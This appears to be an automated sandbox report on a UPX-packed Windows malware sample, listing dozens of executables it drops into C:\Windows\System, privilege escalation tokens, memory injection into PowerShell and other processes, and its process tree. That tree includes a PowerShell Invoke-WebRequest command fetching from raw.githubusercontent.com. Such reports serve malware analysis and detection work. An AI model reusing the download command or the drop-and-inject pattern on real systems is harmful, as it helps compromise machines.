N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\EYOoPit.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\xAqMrcp.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\SJRurLf.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\DOXsXzi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\HRCHqJb.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\JqRkpdq.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ZmBKJQJ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\wxXpMPN.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ttCkeYH.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\oQrHpmn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\mjhNoeX.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\YpXGSMG.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\jrjLbjm.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\QBXSPes.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\zROwKar.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\lwORxFQ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\guLwTHl.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\hyWQTFn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\owiDXUR.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\dQmctNl.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\jsXtKkD.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\XtPmHix.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\drNHQdt.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\OfKjSeM.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\VRsDcQy.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aEYnzUY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aMdWYgi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\pIwMtTL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\xbrfDUL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kBQaXEq.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\tYHenuf.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\BPXLaLx.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\dFwLLHW.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\cznbGWF.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\nHPqAhC.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\cpCdCUw.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ZlyNEWG.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\PRIdgrO.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\eJvDuMm.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\YJNhpzX.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\RlHQSpi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\MdrFgOx.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\UHXSgJq.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\NgBpNHS.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kxxzvMZ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\JiDpFGD.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\PcSMTSS.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\erDPjFJ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\CGfVOTk.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\njpqGgJ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aantIQQ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\MdEWxec.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\osXcyzp.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\oFRzzxl.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\xDrgFXu.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\faOBtZz.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\mvTQWdC.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\PSTeAsM.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\lDgbZLY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\nyqugbV.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\FRYaOcc.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\lFDkZAa.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\hLNnuWn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\XrfqrVn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\TuNNhTj.exe
PID 2420 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\TuNNhTj.exe
PID 2420 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\TuNNhTj.exe
PID 2420 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\amSOOrS.exe
PID 2420 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\amSOOrS.exe
PID 2420 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\amSOOrS.exe
PID 2420 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\gPLqLwT.exe
PID 2420 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\gPLqLwT.exe
PID 2420 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\gPLqLwT.exe
PID 2420 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\EZDMQMm.exe
PID 2420 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\EZDMQMm.exe
PID 2420 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\EZDMQMm.exe
PID 2420 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\PPGBUgh.exe
PID 2420 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\PPGBUgh.exe
PID 2420 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\PPGBUgh.exe
PID 2420 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\mDeSSIQ.exe
PID 2420 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\mDeSSIQ.exe
PID 2420 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\mDeSSIQ.exe
PID 2420 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pyEWYni.exe
PID 2420 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pyEWYni.exe
PID 2420 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pyEWYni.exe
PID 2420 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ydiDNmI.exe
PID 2420 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ydiDNmI.exe
PID 2420 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ydiDNmI.exe
PID 2420 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\qQEsBLy.exe
PID 2420 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\qQEsBLy.exe
PID 2420 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\qQEsBLy.exe
PID 2420 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\Ceynmlz.exe
PID 2420 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\Ceynmlz.exe
PID 2420 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\Ceynmlz.exe
PID 2420 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\SHotOeT.exe
PID 2420 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\SHotOeT.exe
PID 2420 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\SHotOeT.exe
PID 2420 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\aJuctSV.exe
PID 2420 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\aJuctSV.exe
PID 2420 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\aJuctSV.exe
PID 2420 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\oSNVSWG.exe
PID 2420 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\oSNVSWG.exe
PID 2420 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\oSNVSWG.exe
PID 2420 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pnjwqQH.exe
PID 2420 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pnjwqQH.exe
PID 2420 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\pnjwqQH.exe
PID 2420 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZIWBJpp.exe
PID 2420 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZIWBJpp.exe
PID 2420 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZIWBJpp.exe
PID 2420 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\tQQzRCk.exe
PID 2420 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\tQQzRCk.exe
PID 2420 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\tQQzRCk.exe
PID 2420 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\VRoWanF.exe
PID 2420 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\VRoWanF.exe
PID 2420 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\VRoWanF.exe
PID 2420 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\uZjSant.exe
PID 2420 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\uZjSant.exe
PID 2420 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\uZjSant.exe
PID 2420 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZQrfFIr.exe
PID 2420 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZQrfFIr.exe
PID 2420 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ZQrfFIr.exe
PID 2420 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\RzpWlBM.exe
PID 2420 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\RzpWlBM.exe
PID 2420 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\RzpWlBM.exe
PID 2420 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\dBOWwHu.exe

Processes

C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\TuNNhTj.exe

C:\Windows\System\TuNNhTj.exe

C:\Windows\System\amSOOrS.exe

C:\Windows\System\amSOOrS.exe

C:\Windows\System\gPLqLwT.exe

C:\Windows\System\gPLqLwT.exe

C:\Windows\System\EZDMQMm.exe

C:\Windows\System\EZDMQMm.exe

C:\Windows\System\PPGBUgh.exe

C:\Windows\System\PPGBUgh.exe

C:\Windows\System\mDeSSIQ.exe

C:\Windows\System\mDeSSIQ.exe

C:\Windows\System\pyEWYni.exe

C:\Windows\System\pyEWYni.exe

C:\Windows\System\ydiDNmI.exe

C:\Windows\System\ydiDNmI.exe

C:\Windows\System\qQEsBLy.exe

C:\Windows\System\qQEsBLy.exe

C:\Windows\System\Ceynmlz.exe

C:\Windows\System\Ceynmlz.exe

C:\Windows\System\SHotOeT.exe

C:\Windows\System\SHotOeT.exe

C:\Windows\System\aJuctSV.exe

C:\Windows\System\aJuctSV.exe

C:\Windows\System\oSNVSWG.exe

C:\Windows\System\oSNVSWG.exe

C:\Windows\System\pnjwqQH.exe

C:\Windows\System\pnjwqQH.exe

C:\Windows\System\ZIWBJpp.exe

C:\Windows\System\ZIWBJpp.exe

C:\Windows\System\tQQzRCk.exe

C:\Windows\System\tQQzRCk.exe

C:\Windows\System\VRoWanF.exe

C:\Windows\System\VRoWanF.exe

C:\Windows\System\uZjSant.exe

C:\Windows\System\uZjSant.exe

C:\Windows\System\ZQrfFIr.exe

C:\Windows\System\ZQrfFIr.exe

C:\Windows\System\RzpWlBM.exe

C:\Windows\System\RzpWlBM.exe

C:\Windows\System\dBOWwHu.exe

C:\Windows\System\dBOWwHu.exe

C:\Windows\System\lDdtoDj.exe

C:\Windows\System\lDdtoDj.exe

C:\Windows\System\PcSMTSS.exe

C:\Windows\System\PcSMTSS.exe

C:\Windows\System\pXPHijv.exe

C:\Windows\System\pXPHijv.exe

C:\Windows\System\ZzWTNcn.exe

C:\Windows\System\ZzWTNcn.exe

C:\Windows\System\yLGtoBO.exe
